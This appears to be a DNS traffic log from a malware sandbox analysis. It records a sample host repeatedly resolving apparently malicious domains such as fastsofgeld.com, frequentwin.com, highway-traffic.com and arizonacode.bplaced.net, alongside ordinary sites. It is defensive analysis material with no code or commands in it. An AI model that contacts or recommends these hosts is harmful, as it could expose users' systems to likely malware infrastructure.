                                                                                                                                                    Sep 29, 2022 15:00:25.040776968 CEST192.168.2.38.8.8.80xeb14Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:26.322037935 CEST192.168.2.38.8.8.80x9f11Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:28.647207975 CEST192.168.2.38.8.8.80x3b22Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:42.988215923 CEST192.168.2.38.8.8.80xc6b1Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:45.397881985 CEST192.168.2.38.8.8.80xa9e8Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:45.912219048 CEST192.168.2.38.8.8.80x1967Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:52.085510969 CEST192.168.2.38.8.8.80x2d58Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:53.161037922 CEST192.168.2.38.8.8.80x73fcStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:53.662019014 CEST192.168.2.38.8.8.80x57e5Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:57.773451090 CEST192.168.2.38.8.8.80x5868Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:58.094145060 CEST192.168.2.38.8.8.80xec96Standard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:58.767446041 CEST192.168.2.38.8.8.80x2a7fStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:00.337764025 CEST192.168.2.38.8.8.80x1b15Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:00.576021910 CEST192.168.2.38.8.8.80xeb39Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:01.579843044 CEST192.168.2.38.8.8.80x532dStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:03.600224972 CEST192.168.2.38.8.8.80x3a1aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.203564882 CEST192.168.2.38.8.8.80x3cdcStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.322859049 CEST192.168.2.38.8.8.80xba96Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.509213924 CEST192.168.2.38.8.8.80xfa5dStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:08.971726894 CEST192.168.2.38.8.8.80xf6fStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:09.778763056 CEST192.168.2.38.8.8.80x710aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:13.171333075 CEST192.168.2.38.8.8.80x6153Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:13.687366009 CEST192.168.2.38.8.8.80x9d96Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:14.076267004 CEST192.168.2.38.8.8.80x87e2Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:15.657779932 CEST192.168.2.38.8.8.80x6a27Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:18.004812956 CEST192.168.2.38.8.8.80xfc21Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:18.180691004 CEST192.168.2.38.8.8.80xd794Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:19.360166073 CEST192.168.2.38.8.8.80xa2a3Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:20.272013903 CEST192.168.2.38.8.8.80xec60Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:21.277936935 CEST192.168.2.38.8.8.80xec60Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:22.305362940 CEST192.168.2.38.8.8.80x186Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:26.552489996 CEST192.168.2.38.8.8.80x760dStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:26.663767099 CEST192.168.2.38.8.8.80xf2a6Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:27.494291067 CEST192.168.2.38.8.8.80xe66bStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.029297113 CEST192.168.2.38.8.8.80xec20Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.052748919 CEST192.168.2.38.8.8.80xa133Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.146617889 CEST192.168.2.38.8.8.80x257dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.959173918 CEST192.168.2.38.8.8.80xe41eStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:29.119290113 CEST192.168.2.38.8.8.80xc960Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:29.147011995 CEST192.168.2.38.8.8.80x5ad4Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:30.567286968 CEST192.168.2.38.8.8.80x13ebStandard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:30.865860939 CEST192.168.2.38.8.8.80x2903Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:31.809437990 CEST192.168.2.38.8.8.80xb1b7Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:31.859767914 CEST192.168.2.38.8.8.80x6f4fStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:32.293320894 CEST192.168.2.38.8.8.80xd4c6Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:32.527832031 CEST192.168.2.38.8.8.80xbfd7Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:35.657813072 CEST192.168.2.38.8.8.80x1d06Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:35.706614017 CEST192.168.2.38.8.8.80x1f63Standard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:36.749614000 CEST192.168.2.38.8.8.80x16e2Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:39.817797899 CEST192.168.2.38.8.8.80xfff9Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:44.714714050 CEST192.168.2.38.8.8.80xa749Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:47.260006905 CEST192.168.2.38.8.8.80x9e56Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:48.101447105 CEST192.168.2.38.8.8.80x4636Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:49.275111914 CEST192.168.2.38.8.8.80x340fStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:50.666040897 CEST192.168.2.38.8.8.80xc91aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:50.981997013 CEST192.168.2.38.8.8.80x6573Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:51.005125999 CEST192.168.2.38.8.8.80x432bStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:51.815507889 CEST192.168.2.38.8.8.80xf6edStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.045985937 CEST192.168.2.38.8.8.80xa8c5Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.080877066 CEST192.168.2.38.8.8.80x752cStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.895745039 CEST192.168.2.38.8.8.80x16bcStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:53.437939882 CEST192.168.2.38.8.8.80x247dStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:53.462959051 CEST192.168.2.38.8.8.80xd6f2Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.198553085 CEST192.168.2.38.8.8.80x5a8aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.379448891 CEST192.168.2.38.8.8.80xc7dStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.409950972 CEST192.168.2.38.8.8.80xfb8fStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.124337912 CEST192.168.2.38.8.8.80x9d8aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.326050997 CEST192.168.2.38.8.8.80xa9a1Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.350909948 CEST192.168.2.38.8.8.80x17b5Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:56.262857914 CEST192.168.2.38.8.8.80x3d9fStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:00.527298927 CEST192.168.2.38.8.8.80xce75Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.189470053 CEST192.168.2.38.8.8.80x792eStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.599586010 CEST192.168.2.38.8.8.80x9440Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.755328894 CEST192.168.2.38.8.8.80xb9b8Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:05.603964090 CEST192.168.2.38.8.8.80x86dbStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:05.604227066 CEST192.168.2.38.8.8.80xa95Standard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.593873024 CEST192.168.2.38.8.8.80x362cStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.818948984 CEST192.168.2.38.8.8.80xce14Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.888150930 CEST192.168.2.38.8.8.80xa5f9Standard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:08.325699091 CEST192.168.2.38.8.8.80x2c20Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:13.591624975 CEST192.168.2.38.8.8.80x7fa5Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:14.228734970 CEST192.168.2.38.8.8.80x6f6dStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:14.952804089 CEST192.168.2.38.8.8.80xeefdStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:22.423861980 CEST192.168.2.38.8.8.80x7e6bStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Sep 29, 2022 14:58:47.024451971 CEST8.8.8.8192.168.2.30x416No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:58:47.840329885 CEST8.8.8.8192.168.2.30xe622No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:58:47.840329885 CEST8.8.8.8192.168.2.30xe622No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:58:47.840329885 CEST8.8.8.8192.168.2.30xe622No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:58:47.840329885 CEST8.8.8.8192.168.2.30xe622No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.890639067 CEST8.8.8.8192.168.2.30x2f38No error (0)yandex.ru5.255.255.80A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.890639067 CEST8.8.8.8192.168.2.30x2f38No error (0)yandex.ru77.88.55.55A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.890639067 CEST8.8.8.8192.168.2.30x2f38No error (0)yandex.ru77.88.55.50A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.890639067 CEST8.8.8.8192.168.2.30x2f38No error (0)yandex.ru5.255.255.88A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.897229910 CEST8.8.8.8192.168.2.30xd8fcNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.536492109 CEST8.8.8.8192.168.2.30x62e3Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.651225090 CEST8.8.8.8192.168.2.30x7ae3Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.918235064 CEST8.8.8.8192.168.2.30x5c9bNo error (0)searchdusty.com37.187.79.168A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.362390041 CEST8.8.8.8192.168.2.30xf12dName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.682387114 CEST8.8.8.8192.168.2.30xcae3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.820411921 CEST8.8.8.8192.168.2.30xd924Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:05.031292915 CEST8.8.8.8192.168.2.30x4125Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:06.125853062 CEST8.8.8.8192.168.2.30xc8d9Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:07.650238991 CEST8.8.8.8192.168.2.30x314bNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.506598949 CEST8.8.8.8192.168.2.30x77d5Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.506808043 CEST8.8.8.8192.168.2.30xa0feNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.614470005 CEST8.8.8.8192.168.2.30x5656Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:09.356161118 CEST8.8.8.8192.168.2.30x6ab4No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:10.933655024 CEST8.8.8.8192.168.2.30xf81No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:11.619107962 CEST8.8.8.8192.168.2.30x7767Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:13.905817986 CEST8.8.8.8192.168.2.30x2fc6Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:13.976738930 CEST8.8.8.8192.168.2.30x4a9Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:16.091564894 CEST8.8.8.8192.168.2.30xc2d3No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:18.992465019 CEST8.8.8.8192.168.2.30x7180No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:18.992465019 CEST8.8.8.8192.168.2.30x7180No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:18.992465019 CEST8.8.8.8192.168.2.30x7180No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:18.992465019 CEST8.8.8.8192.168.2.30x7180No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:20.406954050 CEST8.8.8.8192.168.2.30x3443Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:20.889580011 CEST8.8.8.8192.168.2.30x3e74Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:21.433654070 CEST8.8.8.8192.168.2.30x95d4Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:22.618987083 CEST8.8.8.8192.168.2.30xdeddNo error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:23.927817106 CEST8.8.8.8192.168.2.30xa541No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:25.060041904 CEST8.8.8.8192.168.2.30xeb14No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:26.341269016 CEST8.8.8.8192.168.2.30x9f11No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:28.666784048 CEST8.8.8.8192.168.2.30x3b22No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:43.007587910 CEST8.8.8.8192.168.2.30xc6b1Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:45.417413950 CEST8.8.8.8192.168.2.30xa9e8Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:45.931674957 CEST8.8.8.8192.168.2.30x1967Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:52.107969046 CEST8.8.8.8192.168.2.30x2d58Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:53.180429935 CEST8.8.8.8192.168.2.30x73fcName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:53.680768967 CEST8.8.8.8192.168.2.30x57e5Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:56.459160089 CEST8.8.8.8192.168.2.30xe1e1Name error (3)ashamedice.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:56.492692947 CEST8.8.8.8192.168.2.30x2b66Name error (3)ashamedice.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:57.793004990 CEST8.8.8.8192.168.2.30x5868Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:57.878669024 CEST8.8.8.8192.168.2.30xf43dName error (3)searchaccount.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:58.120162964 CEST8.8.8.8192.168.2.30xec96No error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:58.787213087 CEST8.8.8.8192.168.2.30x2a7fNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:00.355777025 CEST8.8.8.8192.168.2.30x1b15Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:00.597893000 CEST8.8.8.8192.168.2.30xeb39Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:01.597019911 CEST8.8.8.8192.168.2.30x532dNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:03.617332935 CEST8.8.8.8192.168.2.30x3a1aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.222920895 CEST8.8.8.8192.168.2.30x3cdcNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.342154980 CEST8.8.8.8192.168.2.30xba96Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:04.528989077 CEST8.8.8.8192.168.2.30xfa5dName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:08.992337942 CEST8.8.8.8192.168.2.30xf6fNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:09.798711061 CEST8.8.8.8192.168.2.30x710aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:13.194140911 CEST8.8.8.8192.168.2.30x6153No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:13.706935883 CEST8.8.8.8192.168.2.30x9d96Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:14.095303059 CEST8.8.8.8192.168.2.30x87e2Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:15.676642895 CEST8.8.8.8192.168.2.30x6a27No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:18.022180080 CEST8.8.8.8192.168.2.30xfc21Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:18.198396921 CEST8.8.8.8192.168.2.30xd794No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:19.379646063 CEST8.8.8.8192.168.2.30xa2a3Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:20.289776087 CEST8.8.8.8192.168.2.30xec60Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:21.295541048 CEST8.8.8.8192.168.2.30xec60Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:22.325237036 CEST8.8.8.8192.168.2.30x186No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:26.571736097 CEST8.8.8.8192.168.2.30x760dNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:26.684187889 CEST8.8.8.8192.168.2.30xf2a6Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:27.522157907 CEST8.8.8.8192.168.2.30xe66bNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.048418045 CEST8.8.8.8192.168.2.30xec20Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.096147060 CEST8.8.8.8192.168.2.30xa133Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.165671110 CEST8.8.8.8192.168.2.30x257dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.165671110 CEST8.8.8.8192.168.2.30x257dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.165671110 CEST8.8.8.8192.168.2.30x257dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.165671110 CEST8.8.8.8192.168.2.30x257dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:28.980909109 CEST8.8.8.8192.168.2.30xe41eName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:29.139987946 CEST8.8.8.8192.168.2.30xc960Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:29.167115927 CEST8.8.8.8192.168.2.30x5ad4Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:30.589966059 CEST8.8.8.8192.168.2.30x13ebNo error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:30.885632038 CEST8.8.8.8192.168.2.30x2903Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:31.826941013 CEST8.8.8.8192.168.2.30xb1b7Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:31.879029989 CEST8.8.8.8192.168.2.30x6f4fName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:32.312654972 CEST8.8.8.8192.168.2.30xd4c6No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:32.547338009 CEST8.8.8.8192.168.2.30xbfd7Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:35.675847054 CEST8.8.8.8192.168.2.30x1d06Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:35.726074934 CEST8.8.8.8192.168.2.30x1f63No error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:36.770555973 CEST8.8.8.8192.168.2.30x16e2Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:39.834747076 CEST8.8.8.8192.168.2.30xfff9No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:44.731662035 CEST8.8.8.8192.168.2.30xa749Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:47.279437065 CEST8.8.8.8192.168.2.30x9e56No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
